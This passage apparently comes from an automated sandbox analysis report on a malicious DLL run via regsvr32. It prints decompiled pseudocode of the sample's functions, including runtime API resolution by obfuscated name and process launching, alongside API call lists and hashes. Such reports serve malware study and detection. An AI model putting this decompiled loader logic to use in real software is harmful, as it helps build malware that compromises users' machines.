                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 023EAE5E
                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(?), ref: 023EAEDB
                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 023EAEE7
                                                                                                                                                                                                                                    • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 023EAF1A
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ExceptionRaise$ErrorLastLibraryLoad
                                                                                                                                                                                                                                    • String ID: $
                                                                                                                                                                                                                                    • API String ID: 948315288-3993045852
                                                                                                                                                                                                                                    • Opcode ID: 0eb6c42081531bae05f3da56506960c9cb43775ee35529837218407448ade23a
                                                                                                                                                                                                                                    • Instruction ID: 1776f57e9e1476c7ac0cb86f5fdf5584377fd331b29979ed3c7ebe2363b272bf
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0eb6c42081531bae05f3da56506960c9cb43775ee35529837218407448ade23a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 32811BB5A40319DFDF21CF98D884BADB7F9BB48714F108429E516E7280EB70E94ACB51
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 27%
                                                                                                                                                                                                                                    			E023E816C(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                                                    				long _v16;
                                                                                                                                                                                                                                    				intOrPtr _v20;
                                                                                                                                                                                                                                    				signed int _v24;
                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                    				long _t43;
                                                                                                                                                                                                                                    				intOrPtr _t44;
                                                                                                                                                                                                                                    				intOrPtr _t46;
                                                                                                                                                                                                                                    				void* _t48;
                                                                                                                                                                                                                                    				void* _t49;
                                                                                                                                                                                                                                    				void* _t50;
                                                                                                                                                                                                                                    				intOrPtr _t54;
                                                                                                                                                                                                                                    				intOrPtr _t57;
                                                                                                                                                                                                                                    				void* _t58;
                                                                                                                                                                                                                                    				void* _t59;
                                                                                                                                                                                                                                    				void* _t60;
                                                                                                                                                                                                                                    				intOrPtr _t66;
                                                                                                                                                                                                                                    				void* _t71;
                                                                                                                                                                                                                                    				void* _t74;
                                                                                                                                                                                                                                    				intOrPtr _t75;
                                                                                                                                                                                                                                    				void* _t77;
                                                                                                                                                                                                                                    				intOrPtr _t79;
                                                                                                                                                                                                                                    				intOrPtr* _t80;
                                                                                                                                                                                                                                    				intOrPtr _t91;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t79 =  *0x23ed33c; // 0x4cc9bc8
                                                                                                                                                                                                                                    				_v24 = 8;
                                                                                                                                                                                                                                    				_t43 = GetTickCount();
                                                                                                                                                                                                                                    				_push(5);
                                                                                                                                                                                                                                    				_t74 = 0xa;
                                                                                                                                                                                                                                    				_v16 = _t43;
                                                                                                                                                                                                                                    				_t44 = E023E70F5(_t74,  &_v16);
                                                                                                                                                                                                                                    				_v8 = _t44;
                                                                                                                                                                                                                                    				if(_t44 == 0) {
                                                                                                                                                                                                                                    					_v8 = 0x23ec1ac;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t46 = E023E8022(_t79);
                                                                                                                                                                                                                                    				_v12 = _t46;
                                                                                                                                                                                                                                    				if(_t46 != 0) {
                                                                                                                                                                                                                                    					_t80 = __imp__;
                                                                                                                                                                                                                                    					_t48 =  *_t80(_v8, _t71);
                                                                                                                                                                                                                                    					_t49 =  *_t80(_v12);
                                                                                                                                                                                                                                    					_t50 =  *_t80(_a4);
                                                                                                                                                                                                                                    					_t54 = E023E2049(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
                                                                                                                                                                                                                                    					_v20 = _t54;
                                                                                                                                                                                                                                    					if(_t54 != 0) {
                                                                                                                                                                                                                                    						_t75 =  *0x23ed27c; // 0x28da5a8
                                                                                                                                                                                                                                    						_t16 = _t75 + 0x23eeb28; // 0x530025
                                                                                                                                                                                                                                    						 *0x23ed11c(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
                                                                                                                                                                                                                                    						_push(4);
                                                                                                                                                                                                                                    						_t77 = 5;
                                                                                                                                                                                                                                    						_t57 = E023E70F5(_t77,  &_v16);
                                                                                                                                                                                                                                    						_v8 = _t57;
                                                                                                                                                                                                                                    						if(_t57 == 0) {
                                                                                                                                                                                                                                    							_v8 = 0x23ec1b0;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t58 =  *_t80(_v8);
                                                                                                                                                                                                                                    						_t59 =  *_t80(_v12);
                                                                                                                                                                                                                                    						_t60 =  *_t80(_a4);
                                                                                                                                                                                                                                    						_t91 = E023E2049(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
                                                                                                                                                                                                                                    						if(_t91 == 0) {
                                                                                                                                                                                                                                    							E023E9039(_v20);
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							_t66 =  *0x23ed27c; // 0x28da5a8
                                                                                                                                                                                                                                    							_t31 = _t66 + 0x23eec48; // 0x73006d
                                                                                                                                                                                                                                    							 *0x23ed11c(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
                                                                                                                                                                                                                                    							 *_a16 = _v20;
                                                                                                                                                                                                                                    							_v24 = _v24 & 0x00000000;
                                                                                                                                                                                                                                    							 *_a20 = _t91;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					E023E9039(_v12);
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return _v24;
                                                                                                                                                                                                                                    			}
                                                                                                                                                                                                                                    0x023e82af
                                                                                                                                                                                                                                    0x023e82b4
                                                                                                                                                                                                                                    0x023e82bb

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 023E8181
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?,80000002,00000005), ref: 023E81C1
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(00000000), ref: 023E81CA
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(00000000), ref: 023E81D1
                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(80000002), ref: 023E81DE
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?,00000004), ref: 023E823E
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?), ref: 023E8247
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?), ref: 023E824E
                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 023E8255
                                                                                                                                                                                                                                      • Part of subcall function 023E9039: HeapFree.KERNEL32(00000000,00000000,023E7F18,00000000,?,?,00000000), ref: 023E9045
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: lstrlen$CountFreeHeapTick
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2535036572-0
                                                                                                                                                                                                                                    • Opcode ID: 9923dee0dc2a905cf31ef747fe6db6201a06da8c130f2d0349605b56bf560990
                                                                                                                                                                                                                                    • Instruction ID: b87bbf38d675e14b16849dea85abb8a5996d8b4d73b195360fccdffedddbd70d
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9923dee0dc2a905cf31ef747fe6db6201a06da8c130f2d0349605b56bf560990
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BF412CB2D00129EFDF21AFA4CD04A9EBBB9EF48314F054451ED05A72A1D7369E29DF90
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 73%
                                                                                                                                                                                                                                    			E023E205E(void* __eax, void* __ecx) {
                                                                                                                                                                                                                                    				long _v8;
                                                                                                                                                                                                                                    				char _v12;
                                                                                                                                                                                                                                    				void* _v16;
                                                                                                                                                                                                                                    				void* _v28;
                                                                                                                                                                                                                                    				long _v32;
                                                                                                                                                                                                                                    				void _v104;
                                                                                                                                                                                                                                    				char _v108;
                                                                                                                                                                                                                                    				long _t36;
                                                                                                                                                                                                                                    				intOrPtr _t40;
                                                                                                                                                                                                                                    				intOrPtr _t47;
                                                                                                                                                                                                                                    				intOrPtr _t50;
                                                                                                                                                                                                                                    				void* _t58;
                                                                                                                                                                                                                                    				void* _t68;
                                                                                                                                                                                                                                    				intOrPtr* _t70;
                                                                                                                                                                                                                                    				intOrPtr* _t71;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t1 = __eax + 0x14; // 0x74183966
                                                                                                                                                                                                                                    				_t69 =  *_t1;
                                                                                                                                                                                                                                    				_t36 = E023E692C(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
                                                                                                                                                                                                                                    				_v8 = _t36;
                                                                                                                                                                                                                                    				if(_t36 != 0) {
                                                                                                                                                                                                                                    					L12:
                                                                                                                                                                                                                                    					return _v8;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				E023EA8D8( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
                                                                                                                                                                                                                                    				_t40 = _v12(_v12);
                                                                                                                                                                                                                                    				_v8 = _t40;
                                                                                                                                                                                                                                    				if(_t40 == 0 && ( *0x23ed260 & 0x00000001) != 0) {
                                                                                                                                                                                                                                    					_v32 = 0;
                                                                                                                                                                                                                                    					asm("stosd");
                                                                                                                                                                                                                                    					asm("stosd");
                                                                                                                                                                                                                                    					asm("stosd");
                                                                                                                                                                                                                                    					_v108 = 0;
                                                                                                                                                                                                                                    					memset( &_v104, 0, 0x40);
                                                                                                                                                                                                                                    					_t47 =  *0x23ed27c; // 0x28da5a8
                                                                                                                                                                                                                                    					_t18 = _t47 + 0x23ee3e6; // 0x73797325
                                                                                                                                                                                                                                    					_t68 = E023E95B1(_t18);
                                                                                                                                                                                                                                    					if(_t68 == 0) {
                                                                                                                                                                                                                                    						_v8 = 8;
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						_t50 =  *0x23ed27c; // 0x28da5a8
                                                                                                                                                                                                                                    						_t19 = _t50 + 0x23ee747; // 0x4cc8cef
                                                                                                                                                                                                                                    						_t20 = _t50 + 0x23ee0af; // 0x4e52454b
                                                                                                                                                                                                                                    						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
                                                                                                                                                                                                                                    						if(_t71 == 0) {
                                                                                                                                                                                                                                    							_v8 = 0x7f;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							_v108 = 0x44;
                                                                                                                                                                                                                                    							E023E84D5();
                                                                                                                                                                                                                                    							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
                                                                                                                                                                                                                                    							_push(1);
                                                                                                                                                                                                                                    							E023E84D5();
                                                                                                                                                                                                                                    							if(_t58 == 0) {
                                                                                                                                                                                                                                    								_v8 = GetLastError();
                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                    								CloseHandle(_v28);
                                                                                                                                                                                                                                    								CloseHandle(_v32);
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						HeapFree( *0x23ed238, 0, _t68);
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t70 = _v16;
                                                                                                                                                                                                                                    				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
                                                                                                                                                                                                                                    				E023E9039(_t70);
                                                                                                                                                                                                                                    				goto L12;
                                                                                                                                                                                                                                    			}


















                                                                                                                                                                                                                                    0x023e20eb
                                                                                                                                                                                                                                    0x023e20f0
                                                                                                                                                                                                                                    0x023e20f7
                                                                                                                                                                                                                                    0x023e210b
                                                                                                                                                                                                                                    0x023e210f
                                                                                                                                                                                                                                    0x023e215e
                                                                                                                                                                                                                                    0x023e2111
                                                                                                                                                                                                                                    0x023e2112
                                                                                                                                                                                                                                    0x023e2119
                                                                                                                                                                                                                                    0x023e2132
                                                                                                                                                                                                                                    0x023e2134
                                                                                                                                                                                                                                    0x023e2138
                                                                                                                                                                                                                                    0x023e213f
                                                                                                                                                                                                                                    0x023e2159
                                                                                                                                                                                                                                    0x023e2141
                                                                                                                                                                                                                                    0x023e214a
                                                                                                                                                                                                                                    0x023e214f
                                                                                                                                                                                                                                    0x023e214f
                                                                                                                                                                                                                                    0x023e213f
                                                                                                                                                                                                                                    0x023e216d
                                                                                                                                                                                                                                    0x023e216d
                                                                                                                                                                                                                                    0x023e20e5
                                                                                                                                                                                                                                    0x023e217c
                                                                                                                                                                                                                                    0x023e2185
                                                                                                                                                                                                                                    0x023e2189
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 023E692C: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,023E207A,?,00000001,?,?,00000000,00000000), ref: 023E6951
                                                                                                                                                                                                                                      • Part of subcall function 023E692C: GetProcAddress.KERNEL32(00000000,7243775A), ref: 023E6973
                                                                                                                                                                                                                                      • Part of subcall function 023E692C: GetProcAddress.KERNEL32(00000000,614D775A), ref: 023E6989
                                                                                                                                                                                                                                      • Part of subcall function 023E692C: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 023E699F
                                                                                                                                                                                                                                      • Part of subcall function 023E692C: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 023E69B5
                                                                                                                                                                                                                                      • Part of subcall function 023E692C: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 023E69CB
                                                                                                                                                                                                                                    • memset.NTDLL ref: 023E20C8
                                                                                                                                                                                                                                      • Part of subcall function 023E95B1: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,023E23E9,63699BCE,023E1354,73797325), ref: 023E95C2
                                                                                                                                                                                                                                      • Part of subcall function 023E95B1: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 023E95DC
                                                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(4E52454B,04CC8CEF,73797325), ref: 023E20FE
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 023E2105
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000), ref: 023E216D
                                                                                                                                                                                                                                      • Part of subcall function 023E84D5: GetProcAddress.KERNEL32(36776F57,023E21E5), ref: 023E84F0
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,00000001), ref: 023E214A
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 023E214F
                                                                                                                                                                                                                                    • GetLastError.KERNEL32(00000001), ref: 023E2153
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3075724336-0
                                                                                                                                                                                                                                    • Opcode ID: b154b32f82febcf623578821b34520440eb309eb2bb2e3ac08c9cb107583e68b
                                                                                                                                                                                                                                    • Instruction ID: a97c2307977abe6db5d73413352ea89620542e3b5aced248005f605c303ae8dc
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b154b32f82febcf623578821b34520440eb309eb2bb2e3ac08c9cb107583e68b
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1D310CB2D00218EFDF209FA4D884E9FBBBDEB08354F014865EA16A7191D735AE49CB50
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 63%
                                                                                                                                                                                                                                    			E023E8307(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                    				intOrPtr _t9;
                                                                                                                                                                                                                                    				intOrPtr _t13;
                                                                                                                                                                                                                                    				char* _t28;
                                                                                                                                                                                                                                    				void* _t33;
                                                                                                                                                                                                                                    				void* _t34;
                                                                                                                                                                                                                                    				char* _t36;
                                                                                                                                                                                                                                    				intOrPtr* _t40;
                                                                                                                                                                                                                                    				char* _t41;
                                                                                                                                                                                                                                    				char* _t42;
                                                                                                                                                                                                                                    				char* _t43;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t34 = __edx;
                                                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                                                    				_t9 =  *0x23ed27c; // 0x28da5a8
                                                                                                                                                                                                                                    				_t1 = _t9 + 0x23ee62c; // 0x253d7325
                                                                                                                                                                                                                                    				_t36 = 0;
                                                                                                                                                                                                                                    				_t28 = E023E9401(__ecx, _t1);
                                                                                                                                                                                                                                    				if(_t28 != 0) {
                                                                                                                                                                                                                                    					_t40 = __imp__;
                                                                                                                                                                                                                                    					_t13 =  *_t40(_t28);
                                                                                                                                                                                                                                    					_v8 = _t13;
                                                                                                                                                                                                                                    					_t41 = E023E2049(_v8 +  *_t40(_a4) + 1);
                                                                                                                                                                                                                                    					if(_t41 != 0) {
                                                                                                                                                                                                                                    						strcpy(_t41, _t28);
                                                                                                                                                                                                                                    						_pop(_t33);
                                                                                                                                                                                                                                    						__imp__(_t41, _a4);
                                                                                                                                                                                                                                    						_t36 = E023E7225(_t34, _t41, _a8);
                                                                                                                                                                                                                                    						E023E9039(_t41);
                                                                                                                                                                                                                                    						_t42 = E023E8E82(StrTrimA(_t36, "="), _t36);
                                                                                                                                                                                                                                    						if(_t42 != 0) {
                                                                                                                                                                                                                                    							E023E9039(_t36);
                                                                                                                                                                                                                                    							_t36 = _t42;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t43 = E023E788B(_t36, _t33);
                                                                                                                                                                                                                                    						if(_t43 != 0) {
                                                                                                                                                                                                                                    							E023E9039(_t36);
                                                                                                                                                                                                                                    							_t36 = _t43;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					E023E9039(_t28);
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return _t36;
                                                                                                                                                                                                                                    			}















                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 023E9401: lstrlen.KERNEL32(00000000,00000000,00000000,73FCC740,?,?,?,023E8321,253D7325,00000000,00000000,73FCC740,?,?,023EA428,?), ref: 023E9468
                                                                                                                                                                                                                                      • Part of subcall function 023E9401: sprintf.NTDLL ref: 023E9489
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,73FCC740,?,?,023EA428,?,04CC95B0), ref: 023E8332
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?,?,?,023EA428,?,04CC95B0), ref: 023E833A
                                                                                                                                                                                                                                      • Part of subcall function 023E2049: RtlAllocateHeap.NTDLL(00000000,00000000,023E7E50), ref: 023E2055
                                                                                                                                                                                                                                    • strcpy.NTDLL ref: 023E8351
                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,?), ref: 023E835C
                                                                                                                                                                                                                                      • Part of subcall function 023E7225: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,023E836B,00000000,?,?,?,023EA428,?,04CC95B0), ref: 023E723C
                                                                                                                                                                                                                                      • Part of subcall function 023E9039: HeapFree.KERNEL32(00000000,00000000,023E7F18,00000000,?,?,00000000), ref: 023E9045
                                                                                                                                                                                                                                    • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,023EA428,?,04CC95B0), ref: 023E8379
                                                                                                                                                                                                                                      • Part of subcall function 023E8E82: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,023E8385,00000000,?,?,023EA428,?,04CC95B0), ref: 023E8E8C
                                                                                                                                                                                                                                      • Part of subcall function 023E8E82: _snprintf.NTDLL ref: 023E8EEA
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                                                                                                                                                                                                                    • String ID: =
                                                                                                                                                                                                                                    • API String ID: 2864389247-1428090586
                                                                                                                                                                                                                                    • Opcode ID: 8d56f39aaaf8cb3f2b7671b4b0299db2199ba89456ae38f62982c2365b7d8edd
                                                                                                                                                                                                                                    • Instruction ID: 92ae032f6ddee5ad81b888ad93419f1b684259d0fba55cb950764ca3b3b481c2
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8d56f39aaaf8cb3f2b7671b4b0299db2199ba89456ae38f62982c2365b7d8edd
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FA11E373900234AB8E32BBB5AC84CAF379EAF887647050416F506AB180DA35DD0A5BE0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 023E6D1F
                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(0070006F), ref: 023E6D33
                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 023E6D45
                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 023E6DA9
                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 023E6DB8
                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 023E6DC3
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: String$AllocFree
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 344208780-0
                                                                                                                                                                                                                                    • Opcode ID: 8b48be0800a65475c1286277926401b8f2517659cb1b5a07d09232151801ee90
                                                                                                                                                                                                                                    • Instruction ID: 3fc723cfbbf9a16c7e5afb0be2b44c3b5cbe6230cccbb25b5c8bd72ef36a0999
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8b48be0800a65475c1286277926401b8f2517659cb1b5a07d09232151801ee90
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D7316B32D00619EFDF11DFB9C845A9FB7BAAF48304F544426E911EB2A0DB71990ACF91
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E023E692C(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                    				intOrPtr _t23;
                                                                                                                                                                                                                                    				intOrPtr _t26;
                                                                                                                                                                                                                                    				_Unknown_base(*)()* _t28;
                                                                                                                                                                                                                                    				intOrPtr _t30;
                                                                                                                                                                                                                                    				_Unknown_base(*)()* _t32;
                                                                                                                                                                                                                                    				intOrPtr _t33;
                                                                                                                                                                                                                                    				_Unknown_base(*)()* _t35;
                                                                                                                                                                                                                                    				intOrPtr _t36;
                                                                                                                                                                                                                                    				_Unknown_base(*)()* _t38;
                                                                                                                                                                                                                                    				intOrPtr _t39;
                                                                                                                                                                                                                                    				_Unknown_base(*)()* _t41;
                                                                                                                                                                                                                                    				intOrPtr _t44;
                                                                                                                                                                                                                                    				struct HINSTANCE__* _t48;
                                                                                                                                                                                                                                    				intOrPtr _t54;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t54 = E023E2049(0x20);
                                                                                                                                                                                                                                    				if(_t54 == 0) {
                                                                                                                                                                                                                                    					_v8 = 8;
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					_t23 =  *0x23ed27c; // 0x28da5a8
                                                                                                                                                                                                                                    					_t1 = _t23 + 0x23ee11a; // 0x4c44544e
                                                                                                                                                                                                                                    					_t48 = GetModuleHandleA(_t1);
                                                                                                                                                                                                                                    					_t26 =  *0x23ed27c; // 0x28da5a8
                                                                                                                                                                                                                                    					_t2 = _t26 + 0x23ee769; // 0x7243775a
                                                                                                                                                                                                                                    					_v8 = 0x7f;
                                                                                                                                                                                                                                    					_t28 = GetProcAddress(_t48, _t2);
                                                                                                                                                                                                                                    					 *(_t54 + 0xc) = _t28;
                                                                                                                                                                                                                                    					if(_t28 == 0) {
                                                                                                                                                                                                                                    						L8:
                                                                                                                                                                                                                                    						E023E9039(_t54);
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						_t30 =  *0x23ed27c; // 0x28da5a8
                                                                                                                                                                                                                                    						_t5 = _t30 + 0x23ee756; // 0x614d775a
                                                                                                                                                                                                                                    						_t32 = GetProcAddress(_t48, _t5);
                                                                                                                                                                                                                                    						 *(_t54 + 0x10) = _t32;
                                                                                                                                                                                                                                    						if(_t32 == 0) {
                                                                                                                                                                                                                                    							goto L8;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							_t33 =  *0x23ed27c; // 0x28da5a8
                                                                                                                                                                                                                                    							_t7 = _t33 + 0x23ee40b; // 0x6e55775a
                                                                                                                                                                                                                                    							_t35 = GetProcAddress(_t48, _t7);
                                                                                                                                                                                                                                    							 *(_t54 + 0x14) = _t35;
                                                                                                                                                                                                                                    							if(_t35 == 0) {
                                                                                                                                                                                                                                    								goto L8;
                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                    								_t36 =  *0x23ed27c; // 0x28da5a8
